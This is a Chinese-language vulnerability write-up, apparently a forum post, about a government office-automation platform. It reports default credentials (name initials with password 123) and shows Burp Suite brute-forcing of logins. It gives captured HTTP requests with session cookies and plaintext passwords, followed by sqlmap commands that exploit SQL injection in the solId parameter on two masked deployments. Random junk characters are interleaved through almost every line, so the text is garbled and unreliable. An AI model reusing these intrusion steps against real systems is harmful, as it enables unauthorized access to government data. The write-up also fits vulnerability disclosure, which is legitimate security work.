|
/ \( w* w: E* x- B
, N4 o. F! e- i5 R' |8 R- c 3 J5 x8 u5 K! e) ^' R! @
* W9 H' [0 [3 `1 K5 J- n3 h! M
平台简介:
! ?/ W1 }5 G* S 0 w/ u: p7 o2 N+ i8 n/ K
X9 G- i3 N+ T4 u1 m
- @5 O* L- U: x$ N
& \ A: {% l: Q! |& P: ~
1 i4 z: W6 W* w1 K, Q# |% j 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' z, c2 Q& x0 g. N! |8 ?同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 H5 \' E- p6 f8 ^- w, S同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!& q; ?# L( R" l) |
0 a1 i* }8 O, ^- y; G: o- \
: I1 s( O) c/ ^( J+ _ 1 E( p9 J, @! }* k0 x) J- r9 a* ]: A
* P9 f$ {" V0 C% @/ }
' [5 |* M) K" t% z" \7 D 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; j! n9 S$ z/ w& v* e6 E/ N & E7 z7 m" Z3 n, Q
) ~0 J _; O5 D& ?+ x6 N+ E# L+ |8 C7 I
% G. k( G. O: E' i& \
% B; z3 N4 G" N1 o6 ?- O8 z( p- n
! v( h) h4 C v6 V) n5 h3 t5 U( e http://1.1.1.1:7197/cap-aco/#(案例2-)+ }4 p+ Y* w/ X: D0 O
5 s3 U r% A n9 u
4 e+ L: v, K3 a, e, F' ?" e4 z( c9 E4 s1 b http://www.XXOO.com (案例1-官网网站)7 u$ F; r$ t/ K! b2 `) b* g
% y! i/ s4 M* u1 b6 H7 f. ?; L1 |1 d- e4 k' ^9 A
0 G8 Y1 w# v* O& x0 _( C
& {6 X1 w4 {( A; h1 i, h
; z0 A' c8 E2 G9 n 漏洞详情:6 O# g4 Q8 L- r, _% S& t' p
+ h. S' E! f' S9 G4 S+ w4 {
6 @$ P6 D: F) s; l; d: _1 i# w0 R
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
( p# w9 X1 _& z5 m% _
$ r- m1 [' D$ a0 A, B ?4 A" }
/ z5 P3 g: p5 v" d* D5 W* C+ \6 U7 n 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:! K" g L6 [) C i* M
8 I% |4 c; ^$ c& s2 s
# @! N; [: O$ M$ K0 }) r
* [5 r( A* @+ o* z# Z . @9 h/ w, H0 X
' E3 _+ O* k! t5 W
7 S) Q$ Z+ w s 4 q7 R& v* N$ D, a1 t( L
) ^8 e! Y( C }
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:( S* U0 u7 Z7 z4 @ t) U
( M* E* b, `6 F# P
6 z. G9 R& t* X& X K2 k# P 1、案例1-官方网站; q; T2 V L& b& Z2 u
! n. Q- ?$ J: l9 _9 L( H
! l' R4 X( u5 R9 ?0 l1 `9 v GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
4 p5 x) L9 T: U * _0 u) H3 p' R r0 g/ @
8 z) D! |: z" V5 Z R2 K- q Host: www.XXOO.com& i8 P0 Y: U+ o6 U+ z6 Z& e
' f* E- v+ P6 g6 Y9 m; r4 d: G& G' u
) y( ]8 G+ r3 R% M
Proxy-Connection: Keep-Alive
) q: v; [6 d8 D& I0 N% }1 {3 S
8 s0 T+ f, M0 O9 b% m/ M* P: E0 L/ n4 w' _
Accept: application/json, text/javascript, */*; q=0.01
, V8 a( t. n$ k. T! q 1 @6 R+ ]1 I# I# N
- P, U+ W" m6 N+ x' ]' h0 v/ H2 D Accept-Language: zh-CN
! I7 T. m; Z p1 p. M% u9 |/ L9 H % j2 L1 _, ^' f( p. t# [
( F+ w2 u2 [6 ?8 }& { Content-Type: application/json: L: z2 G$ E/ [ h& R, i) w
0 {3 k. l# a+ b5 ~" p) ~% P
% }& A# l% S1 W) f, i9 X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
3 Q9 w6 I) @, L) P6 g 2 x1 X" D1 `$ ` q2 G
* b( M8 e5 \+ j! R3 \$ H X-Requested-With: XMLHttpRequest
; e l8 J4 o! O: X/ ] ) e8 Y2 @- q3 J9 i6 T" E: g
2 W# S, F6 }8 o! q/ V7 `( Y
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
! K* ^" x V" W, v
( k, P+ c& _: L0 u
5 ]0 g! h7 ]0 V2 l4 i Accept-Encoding: gzip, deflate, sdch
C# |- f+ c9 n( a9 X
( F; x7 z- E9 h1 F) f
7 p# K4 |1 g9 f- W# M Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e7 e( u+ c/ p# z1 n/ e9 g
: u' ~/ K5 i: n! C/ n) R8 I0 I
3 [0 I6 d- Q% s1 y1 A
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:- g2 y% Z* P0 `2 U# }7 C, D- i5 a
/ ^7 q- \& A% Q( U
2 C9 R3 ]2 {/ i3 C: J1 n
0 y8 x0 r. s7 c3 T# ]' D
) M4 K, J$ z: ^
: A \/ D7 H4 y4 Y' d2 G
# u1 U m$ v2 N8 H
$ I6 Y5 V6 J8 f7 K, O! f
; g8 h0 S9 A& i L
6 B( N2 U8 w% _) z& w
; q3 V! D, r* _" G$ A$ `2 d7 R
: u' U1 L7 u) s, B' j+ t
/ a: B) S" Z; V+ e$ O( P; w # q- k8 T) U2 x& M! M
! ]! [2 v8 r2 W% D. x+ M
& I4 M% v# q4 H, O 5 M& d: @# v- j9 q Q4 M5 P
; t6 j4 V2 U: H% s& y
2、案例2-某天河云平台
! L& l. w3 ~4 K+ F5 T
# D. N4 G, `/ K6 T* y6 ~: ~1 K* O. L4 D3 J# `
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1* f- S- l( H+ o) z3 M
! G$ d8 V0 l6 p' X! j
% b6 H! ] ]# n/ M% e/ p+ I% s Host: 1.1.1.:7197! s) V, l0 P& Y- E% @/ K! v
" t& }1 `3 t6 [* G6 a$ d( g* H
2 t' }+ i7 k$ r- e Accept: application/json, text/javascript, */*; q=0.01
; W% a' I1 C$ z , M+ c3 p" d5 N1 y# O: m6 z9 M
, {9 W$ v, c2 y# m+ [. x X-Requested-With: XMLHttpRequest
- Y7 |( s8 a& H, Z" R2 W" s2 @
4 g: g. _- e; ], O5 p8 R5 g& V; k) ]; p4 b# G6 g0 _: H
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
9 s- L/ Q' K/ I3 [, V; K
/ v+ q6 I6 b3 d& `
7 H* C3 M& v% L" b4 o Content-Type: application/json
) f* G5 F$ E+ B" r 2 V3 O) l7 t1 f! V, t
, _: S% `# O4 `. a; L Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
5 R9 v* W8 `' a: q- Y5 w $ L( f3 c5 X' I
+ @/ Y! i2 S8 l: W5 Y! E% i$ T4 r Accept-Language: zh-CN,zh;q=0.8
; i( b X/ F' Z1 @" g6 I
]) L& A3 x+ D3 L- k3 H9 ^9 ?& k2 w$ }/ h
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
, S6 M% D8 C' z8 O, m7 }/ A# i0 F 6 {9 m! N9 w0 C, p) p& [
# ^$ \/ c! P4 l2 g, O/ h, m
Connection: close
: `' L* D% r5 P1 T+ ~/ h - N, P$ t! Q: j
# x% A1 d1 b4 u& b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:; T# G$ k. m o9 W+ [
* v, \6 R U- C2 c& A0 g z* ~4 H) X2 N- J
& c6 m b" y1 }! d1 _
/ v4 B E# ], P. B7 b7 T. L5 Y" a# M- t0 T b5 j
' X1 B4 Q. ]$ ?5 t |